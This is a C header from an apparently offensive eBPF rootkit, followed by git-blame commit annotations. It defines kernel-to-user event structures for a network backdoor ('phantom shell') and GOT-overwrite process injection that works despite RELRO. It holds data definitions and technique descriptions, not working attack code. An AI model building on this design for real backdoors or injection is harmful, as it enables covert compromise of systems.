src/common/map_common.h

#ifndef __MAP_COMMON_H
#define __MAP_COMMON_H

#include "struct_common.h"

// Ring buffer for kernel->user communication
#define RB_EVENT_MAX_MESSAGE_SIZE 512
typedef enum {
    INFO,
    DEBUG,
    EXIT,
    ERROR,
    COMMAND,
    PSH_UPDATE,
    VULN_SYSCALL
} event_type_t;

struct rb_event {
	int pid;
    char message[RB_EVENT_MAX_MESSAGE_SIZE];
    int code;
    struct backdoor_phantom_shell_data bps_data;
    __u64 syscall_address;
    __u64 process_stack_return_address;
    __u64 libc_main_address;
    __u64 libc_dlopen_mode_address;
    __u64 libc_malloc_address;
    __u64 got_address;
    __s32 got_offset;
    int relro_active;
    event_type_t event_type;
    __u32 client_ip;
    __u16 client_port;
};

#endif
Added new kprobe to the filesystem ebpf section. Now receiving read events, and storing them in a map for later use, along with a reference to the user-space memory buffer 2022-01-14 21:18:51 -05:00			`#ifndef __MAP_COMMON_H`
			`#define __MAP_COMMON_H`

Further completed the phantom shell routine and added more checks in TC, still not finished, payload rewriting remains, but the rest is fully ready 2022-05-10 23:04:19 -04:00			`#include "struct_common.h"`

Added new kprobe to the filesystem ebpf section. Now receiving read events, and storing them in a map for later use, along with a reference to the user-space memory buffer 2022-01-14 21:18:51 -05:00			`// Ring buffer for kernel->user communication`
Added new map structure, in preparation for new internal maps storing requested commands via the network backdoor 2022-02-14 20:08:30 -05:00			`#define RB_EVENT_MAX_MESSAGE_SIZE 512`
Added new kprobe to the filesystem ebpf section. Now receiving read events, and storing them in a map for later use, along with a reference to the user-space memory buffer 2022-01-14 21:18:51 -05:00			`typedef enum {`
			`INFO,`
			`DEBUG,`
			`EXIT,`
Completed message passing of commands to userspace via ebpf ringbuffer 2022-05-05 13:22:47 -04:00			`ERROR,`
Further completed the phantom shell routine and added more checks in TC, still not finished, payload rewriting remains, but the rest is fully ready 2022-05-10 23:04:19 -04:00			`COMMAND,`
Merged master and develop, now all changes together. Fully tested and working. 2022-05-15 20:46:35 -04:00			`PSH_UPDATE,`
Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated 2022-04-07 07:11:28 -04:00			`VULN_SYSCALL`
Added new kprobe to the filesystem ebpf section. Now receiving read events, and storing them in a map for later use, along with a reference to the user-space memory buffer 2022-01-14 21:18:51 -05:00			`} event_type_t;`

			`struct rb_event {`
			`int pid;`
			`char message[RB_EVENT_MAX_MESSAGE_SIZE];`
			`int code;`
Further completed the phantom shell routine and added more checks in TC, still not finished, payload rewriting remains, but the rest is fully ready 2022-05-10 23:04:19 -04:00			`struct backdoor_phantom_shell_data bps_data;`
Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated 2022-04-07 07:11:28 -04:00			`__u64 syscall_address;`
			`__u64 process_stack_return_address;`
			`__u64 libc_main_address;`
			`__u64 libc_dlopen_mode_address;`
			`__u64 libc_malloc_address;`
			`__u64 got_address;`
Now control flow is redirected back to the syscall after running the shared library constructor instead of skipping it 2022-04-09 14:17:09 -04:00			`__s32 got_offset;`
Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated 2022-04-07 07:11:28 -04:00			`int relro_active;`
Added new kprobe to the filesystem ebpf section. Now receiving read events, and storing them in a map for later use, along with a reference to the user-space memory buffer 2022-01-14 21:18:51 -05:00			`event_type_t event_type;`
Fixed phantom shell, added ips for all types of backdoor triggers so that we can use different interfaces 2022-05-15 16:45:47 -04:00			`__u32 client_ip;`
			`__u16 client_port;`
Added new kprobe to the filesystem ebpf section. Now receiving read events, and storing them in a map for later use, along with a reference to the user-space memory buffer 2022-01-14 21:18:51 -05:00			`};`

			`#endif`